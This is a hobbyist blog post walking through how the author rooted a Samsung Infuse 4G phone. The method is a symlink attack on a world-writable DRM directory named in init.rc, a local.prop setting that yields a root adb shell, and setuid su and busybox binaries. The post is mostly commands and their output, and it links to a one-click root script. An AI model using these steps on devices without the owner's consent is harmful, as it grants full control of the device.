I received a Samsung Infuse 4G this year for Christmas, and one of the first questions I had was how to let this bad boy run free. Doing a little searching around, it looked like the device was already rootable by the RageAgainstTheCage exploit by the Android Exploid Crew, but of course using an already-written, pre-compiled exploit is too boring.
Note, before we even begin, the device should be placed into USB debugging mode so we can interact with it from a shell (via the ADB – Android Debug Bridge).
After some snooping around, I noticed that the device was vulnerable to a flaw similar to the ones Dan Rosenberg found with the Droid 3 and Admire. In the init.rc script (which is run at startup as root), we see the following command:
# Permission for WMDRM sample.hds file chmod 0777 /data/data/.drm/.wmdrm/sample.hds
The sample.hds file doesn’t actually exist, but that fact is irrelevant to the situation. The interesting thing here is that the .wmdrm directory is also 0777, so we have full control over its contents. Let’s create a symlink to /data where sample.hds is supposed to be and reboot:
$ ln -s /data /data/data/.drm/.wmdrm/sample.hds $ ls -l /data/data/.drm/.wmdrm/sample.hds lrwxrwxrwx shell shell 2012-01-02 20:13 sample.hds -> /data $ exit sh-4.1$ ./adb reboot sh-4.1$ ./adb shell $ ls -l drwxrwx--x system system 2012-01-02 20:14 dbdata dr-x------ root root 2012-01-02 20:14 config drwxrwx--- system cache 2012-01-02 20:14 cache drwxrwx--x radio radio 2012-01-02 20:14 efs lrwxrwxrwx root root 2012-01-02 20:14 sdcard -> /mnt/sdcard drwxr-xr-x root root 2012-01-02 20:14 acct drwxrwxr-x root system 2012-01-02 20:14 mnt lrwxrwxrwx root root 2012-01-02 20:14 d -> /sys/kernel/debug lrwxrwxrwx root root 2012-01-02 20:14 etc -> /system/etc drwxr-xr-x root root 2012-01-02 20:14 system drwxrwxrwx system system 2012-01-02 20:14 data drwxr-xr-x root root 1969-12-31 19:00 sys drwxr-xr-x root root 2011-08-03 23:33 modules dr-xr-xr-x root root 1969-12-31 19:00 proc drwxr-xr-x root root 2012-01-02 20:14 dev -rwxr-xr-x root root 12127 2010-08-12 10:06 recovery.rc -rwxr-xr-x root root 945 2010-08-27 09:41 lpm.rc -rw-r--r-- root root 25100 2011-03-17 02:00 init.rc drwxr-xr-x root root 2011-08-03 23:33 res drwxr-xr-x root root 2011-08-03 23:33 lib drwxr-xr-x root root 2011-08-03 23:33 sbin -rw-r--r-- root root 118 2011-08-03 23:13 default.prop -rw-r--r-- root root 1677 2010-07-06 15:13 init.goldfish.rc -rw-r--r-- root root 2378 2010-12-14 23:01 fota.rc -rwxr-xr-x root root 379 2010-05-28 03:06 init.smdkc110.rc -rwxr-xr-x root root 133016 2011-08-03 23:19 init $
Our symlink was followed, and now the /data directory is 0777! From here we’ll create a /data/local.prop file with a configuration setting to not drop privileges when spawning a shell:
$ echo ro.kernel.qemu=1 > /data/local.prop $ exit sh-4.1$ ./adb reboot sh-4.1$
After restarting, the phone refuses to boot and vibrates a bunch due to parsing the ro.kernel.qemu property. We told the device it was running in an emulator when it’s actually still running on hardware, leading to confusion. However, we are still able to spawn a shell with adb:
sh-4.1$ ./adb shell # id uid=0(root) gid=2000(shell) groups=1007(log) #
Success! For persistence, we’ll follow the typical song and dance and copy over some binaries and install the Superuser app:
# mount -o rw,remount /dev/stl9 /system # exit sh-4.1$ ./adb push su /system/bin 233 KB/s (26264 bytes in 0.109s) sh-4.1$ ./adb push busybox /system/bin 500 KB/s (1867568 bytes in 3.646s) sh-4.1$ ./adb install Superuser.apk 449 KB/s (196521 bytes in 0.427s) pkg: /data/local/tmp/Superuser.apk ^C sh-4.1$ ./adb shell # chmod 4755 /system/bin/su /system/bin/busybox #
Clean up our files and reboot the device:
# rm /data/local.prop # rm /data/data/.drm/.wmdrm/sample.hds # reboot sh-4.1$
Running `su` in the adb shell, as well as apps for rooted phones, will now prompt the user (on the phone itself) to grant root privileges to the process. This selection can be remembered for future use.
A one-click root script for Linux is available here: http://www.poppopret.org/dl/Infuse4G-root.tgz . If this exploit works for other phones, contact me and I’ll update the post.
Thanks to Dan Rosenberg for his tips and guidance throughout the process.